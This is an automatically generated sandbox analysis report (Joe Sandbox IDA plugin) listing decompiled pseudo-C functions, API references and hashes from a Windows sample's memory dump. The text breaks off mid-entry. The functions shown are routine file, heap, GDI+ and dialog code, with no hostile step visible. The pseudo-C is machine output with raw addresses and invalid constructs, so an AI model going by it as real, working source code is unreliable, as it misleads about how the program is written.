                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: 9b86a420fd1fafcd29df486741ddc59666483f0e81ca7afbc521abb421a9c489
                                                    • Instruction ID: 855139c5af4f0fa2fd384bcbe2168cb0eb52ea5583a86be99f968f6cd247530e
                                                    • Opcode Fuzzy Hash: 9b86a420fd1fafcd29df486741ddc59666483f0e81ca7afbc521abb421a9c489
                                                    • Instruction Fuzzy Hash: FC01A533900568ABCF21BBA8CC85FDEB731EF88750F05412DE812B7262DA34CE01D6A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CE3C0D(void* __ecx, signed int _a4, CHAR* _a8, intOrPtr _a12, intOrPtr _a16) {
                                                    				_Unknown_base(*)()* _t10;
                                                    				struct HINSTANCE__* _t12;
                                                    				_Unknown_base(*)()* _t13;
                                                    				_Unknown_base(*)()** _t19;
                                                    				signed int _t20;
                                                    				signed int _t21;
                                                    
                                                    				_t19 = 0xd220ec + _a4 * 4;
                                                    				_t10 =  *_t19;
                                                    				_t21 = _t20 | 0xffffffff;
                                                    				if(_t10 == _t21) {
                                                    					L6:
                                                    					return 0;
                                                    				}
                                                    				if(_t10 == 0) {
                                                    					_t12 = E00CE3B72(__ecx, _a12, _a16); // executed
                                                    					if(_t12 == 0) {
                                                    						L5:
                                                    						 *_t19 = _t21;
                                                    						goto L6;
                                                    					}
                                                    					_t13 = GetProcAddress(_t12, _a8);
                                                    					if(_t13 == 0) {
                                                    						goto L5;
                                                    					}
                                                    					 *_t19 = _t13;
                                                    					return _t13;
                                                    				}
                                                    				return _t10;
                                                    			}










                                                    APIs
                                                    • GetProcAddress.KERNEL32(00000000,?), ref: 00CE3C3F
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AddressProc
                                                    • String ID:
                                                    • API String ID: 190572456-0
                                                    • Opcode ID: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                    • Instruction ID: 54bc5e34ec55069b1d0ad9591c5cd6fe9b2d83cceea6c986e8d265f5f70416a9
                                                    • Opcode Fuzzy Hash: 4492134fe61d5968e261445a28b753d61389895d64bd539feadaa65d39c63994
                                                    • Instruction Fuzzy Hash: 50F0EC322003D6AFCF114E6AEC08A9A7799EF05B617204225FA25E7190DB31FB20D7A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 94%
                                                    			E00CE8E06(void* __ecx, long _a4) {
                                                    				void* _t4;
                                                    				void* _t6;
                                                    				void* _t7;
                                                    				void* _t8;
                                                    				long _t9;
                                                    
                                                    				_t7 = __ecx;
                                                    				_t9 = _a4;
                                                    				if(_t9 > 0xffffffe0) {
                                                    					L7:
                                                    					 *((intOrPtr*)(E00CE91A8())) = 0xc;
                                                    					__eflags = 0;
                                                    					return 0;
                                                    				}
                                                    				if(_t9 == 0) {
                                                    					_t9 = _t9 + 1;
                                                    				}
                                                    				while(1) {
                                                    					_t4 = RtlAllocateHeap( *0xd226e4, 0, _t9); // executed
                                                    					if(_t4 != 0) {
                                                    						break;
                                                    					}
                                                    					__eflags = E00CE8C34();
                                                    					if(__eflags == 0) {
                                                    						goto L7;
                                                    					}
                                                    					_t6 = E00CE7A5E(_t7, _t8, __eflags, _t9);
                                                    					_pop(_t7);
                                                    					__eflags = _t6;
                                                    					if(_t6 == 0) {
                                                    						goto L7;
                                                    					}
                                                    				}
                                                    				return _t4;
                                                    			}









                                                    APIs
                                                    • RtlAllocateHeap.NTDLL(00000000,?,?,?,00CE4286,?,0000015D,?,?,?,?,00CE5762,000000FF,00000000,?,?), ref: 00CE8E38
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AllocateHeap
                                                    • String ID:
                                                    • API String ID: 1279760036-0
                                                    • Opcode ID: 35cdcb80a53a44cce55ae00700c8830a68443657887ef70157421ad1641a49d2
                                                    • Instruction ID: 7ada6ce07a8dbf83b07d9e6e4def2aa53132b651da481db04842e52c71dfdf8c
                                                    • Opcode Fuzzy Hash: 35cdcb80a53a44cce55ae00700c8830a68443657887ef70157421ad1641a49d2
                                                    • Instruction Fuzzy Hash: 86E06D3A2062E567EA7127679D05BAF76499B427B4F150121BC2C97191CF60CE0592E1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 93%
                                                    			E00CC5ABD(intOrPtr __ecx, void* __eflags) {
                                                    				void* _t36;
                                                    
                                                    				E00CDEB78(0xcf2739, _t36);
                                                    				_push(__ecx);
                                                    				 *((intOrPtr*)(_t36 - 0x10)) = __ecx;
                                                    				E00CCB505(__ecx); // executed
                                                    				 *(_t36 - 4) =  *(_t36 - 4) & 0x00000000;
                                                    				E00CD0637();
                                                    				 *(_t36 - 4) = 1;
                                                    				E00CD0637();
                                                    				 *(_t36 - 4) = 2;
                                                    				E00CD0637();
                                                    				 *(_t36 - 4) = 3;
                                                    				E00CD0637();
                                                    				 *(_t36 - 4) = 4;
                                                    				E00CD0637();
                                                    				 *(_t36 - 4) = 5;
                                                    				E00CC5CAC(__ecx,  *(_t36 - 4));
                                                    				 *[fs:0x0] =  *((intOrPtr*)(_t36 - 0xc));
                                                    				return __ecx;
                                                    			}





                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CC5AC2
                                                      • Part of subcall function 00CCB505: __EH_prolog.LIBCMT ref: 00CCB50A
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: H_prolog
                                                    • String ID:
                                                    • API String ID: 3519838083-0
                                                    • Opcode ID: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                    • Instruction ID: f57993e6aac6344007171e647144eec5a3d76b19c30e47a6edccf918f6c4f901
                                                    • Opcode Fuzzy Hash: afa72da564cdf59b12284fc9826a872f24ff522b4188ff4544a24d7ac92243a9
                                                    • Instruction Fuzzy Hash: 4C018C30810794DAD725F7B8C0417EDFBA49F64304F68848EA95653382CBB46B09E7A2
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 89%
                                                    			E00CC9620(void* __ecx) {
                                                    				void* _t16;
                                                    				void* _t21;
                                                    
                                                    				_t21 = __ecx;
                                                    				_t16 = 1;
                                                    				if( *(__ecx + 8) != 0xffffffff) {
                                                    					if( *((char*)(__ecx + 0x15)) == 0 &&  *((intOrPtr*)(__ecx + 0x10)) == 0) {
                                                    						_t5 = FindCloseChangeNotification( *(__ecx + 8)) - 1; // -1
                                                    						asm("sbb bl, bl");
                                                    						_t16 =  ~_t5 + 1;
                                                    					}
                                                    					 *(_t21 + 8) =  *(_t21 + 8) | 0xffffffff;
                                                    				}
                                                    				 *(_t21 + 0x10) =  *(_t21 + 0x10) & 0x00000000;
                                                    				if(_t16 == 0 &&  *((intOrPtr*)(_t21 + 0x1e)) != _t16) {
                                                    					E00CC6BD5(0xd01098, _t21 + 0x32);
                                                    				}
                                                    				return _t16;
                                                    			}






                                                    APIs
                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,00CC95D6,?,?,?,?,?,00CF2641,000000FF), ref: 00CC963B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ChangeCloseFindNotification
                                                    • String ID:
                                                    • API String ID: 2591292051-0
                                                    • Opcode ID: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                    • Instruction ID: 210fb91f7e8d684acc0e6d22dbfee8ce981e6e9a22c00fec4375d085a31e97ed
                                                    • Opcode Fuzzy Hash: 38cb123a5dce571631a17392b854281b1b7c788a1d3932988227d428c2ac61fb
                                                    • Instruction Fuzzy Hash: 5FF08270481B559FDB308A24C55CF92B7E8EB12321F045B5EE0F7429E0D771AA8DDA50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CCA56D(void* __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
                                                    				void* _t13;
                                                    				intOrPtr _t19;
                                                    
                                                    				_t19 = _a8;
                                                    				 *((char*)(_t19 + 0x1044)) = 0;
                                                    				if(E00CCBDB4(_a4) != 0) {
                                                    					L3:
                                                    					return 0;
                                                    				}
                                                    				_t13 = E00CCA69B(0xffffffff, _a4, _t19); // executed
                                                    				if(_t13 == 0xffffffff) {
                                                    					goto L3;
                                                    				}
                                                    				FindClose(_t13); // executed
                                                    				 *(_t19 + 0x1040) =  *(_t19 + 0x1040) & 0x00000000;
                                                    				 *((char*)(_t19 + 0x100c)) = E00CCA28F( *((intOrPtr*)(_t19 + 0x1008)));
                                                    				 *((char*)(_t19 + 0x100d)) = E00CCA2A6( *((intOrPtr*)(_t19 + 0x1008)));
                                                    				return 1;
                                                    			}






                                                    APIs
                                                      • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6C4
                                                      • Part of subcall function 00CCA69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6F2
                                                      • Part of subcall function 00CCA69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00CCA592,000000FF,?,?), ref: 00CCA6FE
                                                    • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00CCA598
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Find$FileFirst$CloseErrorLast
                                                    • String ID:
                                                    • API String ID: 1464966427-0
                                                    • Opcode ID: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                    • Instruction ID: 32c283802877f1229fdfe14fcd86076f67a26e894a71bfe1e0b321be27d71cc8
                                                    • Opcode Fuzzy Hash: 3e3b6985d9a27902eb593dac6d668d6fdb1ae65fcc68f8713c9ca3f3d2268a79
                                                    • Instruction Fuzzy Hash: A4F08232408794BACB2257B4C909FDB7B906F1A339F04CA4EF1FD52196C2755494AB23
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 75%
                                                    			E00CD0E08() {
                                                    				void* __esi;
                                                    				void* _t2;
                                                    
                                                    				L00CD1B58(); // executed
                                                    				_t2 = E00CD1B5D();
                                                    				if(_t2 != 0) {
                                                    					_t2 = E00CC6C31(_t2, 0xd01098, 0xff, 0xff);
                                                    				}
                                                    				if( *0xd010a4 != 0) {
                                                    					_t2 = E00CC6C31(_t2, 0xd01098, 0xff, 0xff);
                                                    				}
                                                    				__imp__SetThreadExecutionState(1);
                                                    				return _t2;
                                                    			}






                                                    APIs
                                                    • SetThreadExecutionState.KERNEL32 ref: 00CD0E3D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: ExecutionStateThread
                                                    • String ID:
                                                    • API String ID: 2211380416-0
                                                    • Opcode ID: a2fff5917558af266c41d03f85d9d8ddc9c93afd0710df3807fa6bbb89bcd25a
                                                    • Instruction ID: 3a7886db9a5b74c353ab8a8bed5ffb4bbb9e2685abf7b9c34ebf2ed297013d6e
                                                    • Opcode Fuzzy Hash: a2fff5917558af266c41d03f85d9d8ddc9c93afd0710df3807fa6bbb89bcd25a
                                                    • Instruction Fuzzy Hash: 9ED0C25060109436EA1137286915BFE26068FC6311F0C002BF68957782CE840886B272
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 68%
                                                    			E00CDA626(signed int __eax, void* __ecx, intOrPtr _a4, intOrPtr _a8) {
                                                    				signed int _v8;
                                                    				void* _t6;
                                                    
                                                    				_push(__ecx);
                                                    				_push(0x10);
                                                    				L00CDEB02();
                                                    				_v8 = __eax;
                                                    				if(__eax == 0) {
                                                    					return 0;
                                                    				}
                                                    				_t6 = E00CDA3B9(__eax, _a4, _a8); // executed
                                                    				return _t6;
                                                    			}






                                                    APIs
                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00CDA62C
                                                      • Part of subcall function 00CDA3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00CDA3DA
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Gdip$AllocBitmapCreateFromStream
                                                    • String ID:
                                                    • API String ID: 1915507550-0
                                                    • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction ID: 03f77114d4934992448d000375a7d1f5fd8bb19fd6de9630e77b2c3b179e8863
                                                    • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                    • Instruction Fuzzy Hash: 63D0C771214209BADF416B61CC1297E7595EB01340F048127BA41D5351EAF1D911A556
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 50%
                                                    			E00CDE5BB(void* __esi) {
                                                    				void* _t2;
                                                    				intOrPtr _t5;
                                                    				void* _t6;
                                                    				void* _t11;
                                                    
                                                    				_t11 = __esi;
                                                    				if(( *0xcf5650 & 0x00001000) == 0) {
                                                    					return _t2;
                                                    				} else {
                                                    					E00CDE664();
                                                    					_t5 =  *0xd21ce8 + 1;
                                                    					 *0xd21ce8 = _t5;
                                                    					if(_t5 == 1) {
                                                    						E00CDE78D(4, 0xd21cec); // executed
                                                    					}
                                                    					_t6 = E00CDE5EE();
                                                    					if(_t6 == 0) {
                                                    						 *0xd21ce4 = 0;
                                                    						return _t6;
                                                    					} else {
                                                    						 *0xcf3278(0xd21ce4, _t11);
                                                    						return  *((intOrPtr*)( *0xd21ce0))();
                                                    					}
                                                    				}
                                                    			}








                                                    APIs
                                                    • DloadProtectSection.DELAYIMP ref: 00CDE5E3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: DloadProtectSection
                                                    • String ID:
                                                    • API String ID: 2203082970-0
                                                    • Opcode ID: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                    • Instruction ID: 3120791142763dc701e80dd8d2fe227639f1cd239e8251bb4e21796bdc6e6ef1
                                                    • Opcode Fuzzy Hash: 622f7e2c3c0afc7e97994772938270ed1d33937337532c50974220fcacbd3d00
                                                    • Instruction Fuzzy Hash: 92D0A9BC0882408AC212FBA8A8827187250B330B44F804153F334C9390EA6080C2F622
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDDD6D(intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                                                    				void* _t7;
                                                    
                                                    				SendDlgItemMessageW( *0xd08458, 0x6a, 0x402, E00CD0264(_a20, _a24, _a28, _a32), 0); // executed
                                                    				_t7 = E00CDB568(); // executed
                                                    				return _t7;
                                                    			}




                                                    0x00cddd92
                                                    0x00cddd98
                                                    0x00cddd9d

                                                    APIs
                                                    • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00CD1B3E), ref: 00CDDD92
                                                      • Part of subcall function 00CDB568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00CDB579
                                                      • Part of subcall function 00CDB568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CDB58A
                                                      • Part of subcall function 00CDB568: IsDialogMessageW.USER32(00010398,?), ref: 00CDB59E
                                                      • Part of subcall function 00CDB568: TranslateMessage.USER32(?), ref: 00CDB5AC
                                                      • Part of subcall function 00CDB568: DispatchMessageW.USER32(?), ref: 00CDB5B6
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                    • String ID:
                                                    • API String ID: 897784432-0
                                                    • Opcode ID: b39a11209d142b0ec5f8ae8be98e72243efce0bda21c03fd1640651bfbe2aff7
                                                    • Instruction ID: e531e7e2424602b1463601a810f241704a60473cea15213258143b83ed08ea89
                                                    • Opcode Fuzzy Hash: b39a11209d142b0ec5f8ae8be98e72243efce0bda21c03fd1640651bfbe2aff7
                                                    • Instruction Fuzzy Hash: 85D09E31144300BAD6122B51DD06F0A7AA2AB98B04F404555B384741B286729D31EF11
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CC98BC(void* __ecx) {
                                                    				long _t3;
                                                    
                                                    				if( *(__ecx + 8) != 0xffffffff) {
                                                    					_t3 = GetFileType( *(__ecx + 8)); // executed
                                                    					if(_t3 == 2 || _t3 == 3) {
                                                    						return 1;
                                                    					} else {
                                                    						goto L1;
                                                    					}
                                                    				} else {
                                                    					L1:
                                                    					return 0;
                                                    				}
                                                    			}





                                                    APIs
                                                    • GetFileType.KERNELBASE(000000FF,00CC97BE), ref: 00CC98C8
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: FileType
                                                    • String ID:
                                                    • API String ID: 3081899298-0
                                                    • Opcode ID: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                    • Instruction ID: 90c4875ed8baf03cd8750f7532d88da876f26329fb6392be1beab35c92f1e97a
                                                    • Opcode Fuzzy Hash: d2a30f54257d40b780d4f57ee64c62dbb3453776adfed8a356e2456b21983bce
                                                    • Instruction Fuzzy Hash: 93C01234800145958E204624D84C6997711EA53365BB486D8C0388A0E1C332CD47EA01
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE1D1() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd2316c); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                    • Instruction ID: 9ce15e9890fb3a5c607f063160668b835430f537d228528e8dc45fe39d4a87ca
                                                    • Opcode Fuzzy Hash: aa31872abf5f4143b54708f509934a294b57586a846f171030b5340a6397db15
                                                    • Instruction Fuzzy Hash: 00B012D535C244BC3104314A2D42C3B010CC0C1B28330843FFE01C86C1D840AC103832
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    C-Code - Quality: 100%
                                                    			E00CDE1EC() {
                                                    
                                                    				E00CDE85D(0xcfc5ec, 0xd23160); // executed
                                                    				goto __eax;
                                                    			}



                                                    0x00cde1e3
                                                    0x00cde1ea

                                                    APIs
                                                    • ___delayLoadHelper2@8.DELAYIMP ref: 00CDE1E3
                                                      • Part of subcall function 00CDE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00CDE8D0
                                                      • Part of subcall function 00CDE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00CDE8E1
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmp
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                    • String ID:
                                                    • API String ID: 1269201914-0
                                                    • Opcode ID: 9d420eb8328818fa8acd394d44e3bdcbaef74933b9fa7b32fe2e67ab1eb3eb0c
                                                    • Instruction ID: cc07e88e0541398dd6d04932ef4a4972d2b24716ddb40f41c925dd842d458061
